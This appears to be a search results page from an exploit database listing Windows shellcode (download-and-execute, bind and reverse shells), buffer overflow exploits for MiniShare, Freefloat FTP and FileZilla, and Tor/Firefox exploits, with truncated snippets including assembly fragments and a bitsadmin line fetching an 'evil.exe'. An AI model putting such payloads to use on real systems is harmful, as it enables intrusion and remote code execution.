239 matches found
Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)
/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...
Description of the security update for the remote code execution vulnerability in Windows Embedded POSReady 2009: April 9, 2019
Description of the security update for the remote code execution vulnerability in Windows Embedded POSReady 2009: April 9, 2019 Summary A remote code execution vulnerability exists in the manner in which the VBScript engine handles objects in memory. To learn more about the vulnerability, go to...
MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method Exploit
Not only the GET method is vulnerable to BOF CVE-2004-2271. HEAD and POST methods are also vulnerable. The difference is minimal, both are exploited in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length ------------------------------------------------------------------- EAX...
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
Not only the GET method is vulnerable to BOF CVE-2004-2271. HEAD and POST methods are also vulnerable. The difference is minimal, both are exploited in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length ------------------------------------------------------------------- EAX...
Windows/x64 - API Hooking Shellcode (117 bytes)
/ Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : email protected Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks DeteleFileW API Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to...
Microsoft Edge Chakra - Heap Buffer Overflow Exploit
Exploit for windows platform in category dos / poc IsCoroutine ... else InterpreterStackFrame::Setup setupfunction, args; sizet varAllocCount = setup.GetAllocationVarCount; //printf"varAllocCount: %d%X\r\n", varAllocCount, varAllocCount; sizet varSizeInBytes = varAllocCount sizeofVar; // //...
Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API Exploit
Exploit for windows platform in category dos / poc Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2 In issue 1260 I discussed Microsoft's "apicall" instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in al...
Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2 In issue 1260 I discussed Microsoft's "apicall" instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if...
Windows x86 - Hide Console Window Shellcode (182 bytes)
Windows x86 - Hide Console Window Shellcode 182 bytes. Shellcode exploit for Winx86 platform / MIT License Copyright c 2017 Ege Balcı Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files the "Software", to deal in the...
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...
Tor Browser / Firefox Remote use-after-free FBI Exploit
Exploit for multiple platform in category remote exploits This is an Javascript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it's getting access to "VirtualAlloc" in...
Tor (Firefox 41 50) - Code Execution
Tor Firefox 41 50 - Code Execution TOR Browser 0day : JavaScript Exploit ! Works on Firefox versions 41 - 50 The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When...
Tor (Firefox 41 < 50) - Code Execution
TOR Browser 0day : JavaScript Exploit ! Works on Firefox versions 41 - 50 The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When exploit opened by a Firefox or Tor...
Windows x64 - Download & Execute Shellcode (358 bytes)
Windows x64 - Download & Execute Shellcode 358 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 Download+Execute Shellcode Author : Roziul Hasan Khan Shifat Date : 24-11-2016 size : 358 bytes Tested on : Windows 7 x64 Professional Email : [email protected] / / section .text...
Freefloat FTP Server 1.0 - RENAME Remote Buffer Overflow
Freefloat FTP Server 1.0 - RENAME Remote Buffer Overflow !/usr/bin/env python -- coding: utf-8 -- Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit Date: 29/10/2016 Exploit Author: Eagleblack Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version:...
Windows/x64 - WinExec() Shellcode (93 bytes)
/ Title : Windows x64 WinExec shellcode Date : 15-10-2016 Author : Roziul Hasan Khan Shifat size : 93 bytes Tested on : Windows 7 Ultimate x64 / / Disassembly of section .text: 0000000000000000 : 0: 99 cltd 1: 65 48 8b 42 60 mov %gs:0x60%rdx,%rax 6: 48 8b 40 18 mov 0x18%rax,%rax a: 48 8b 70 10 mo...
Windows/x86 - Persistent Reverse Shell TCP (494 Bytes)
/ Title : Windows x86 persistent reverse shell tcp Author : Roziul Hasan Khan Shifat Date : 04-09-2016 Tested on : Windows 7 x86 / / Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x3...
Windows/x86 - WinExec("cmd.exe",0) Shellcode (184 bytes)
/ Title : Windows x86 WinExec"cmd.exe",0 shellcode Date : 07/06/2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x86 / / To Compile: -------------- $nasm -f win32 winexec.asm -o exec.obj Linking: ---------- $ "C:\Program Files\CodeBlocks\MinGW\bin\ld.exe" -o winexec.exe...
Windows x86 WinExec"cmd.exe",0 Shellcode
Windows x86 WinExec"cmd.exe",0 Shellcode. Shellcode exploit for win32 platform / Title : Windows x86 WinExec"cmd.exe",0 shellcode Date : 07/06/2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x86 / / To Compile: -------------- $nasm -f win32 winexec.asm -o exec.obj Linkin...
FileZilla Client 2.2.x - Remote Buffer Overflow (SEH)
Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit Date: 02/08/2015 Exploit Author: ly0n Vendor Homepage: filezilla-project.org/ Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90 Version: tested on filezilla 2.2.21 Tested on: Windows XP sp3...